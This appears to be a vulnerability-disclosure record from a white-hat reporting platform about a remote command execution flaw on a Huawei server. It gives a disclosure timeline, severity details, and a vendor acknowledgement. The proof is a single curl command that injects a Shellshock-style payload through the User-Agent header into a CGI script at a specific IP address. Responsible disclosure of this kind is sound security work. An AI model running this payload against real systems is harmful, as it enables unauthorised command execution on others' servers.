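2015-05-10: Details reported to the vendor; awaiting vendor handling
2015-05-10: Vendor confirmed; details disclosed only to the vendor
2015-05-20: Details disclosed to core white hats and experts in related fields
2015-05-30: Details disclosed to regular white hats
2015-06-09: Details disclosed to trainee white hats
2015-06-24: Details disclosed to the public
Remote command execution vulnerability on a Huawei server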
curl http://122.11.38.69:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
Delete
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-05-10 22:38
Ah, the famous 猪猪侠. Thank you for the reminder.
None yet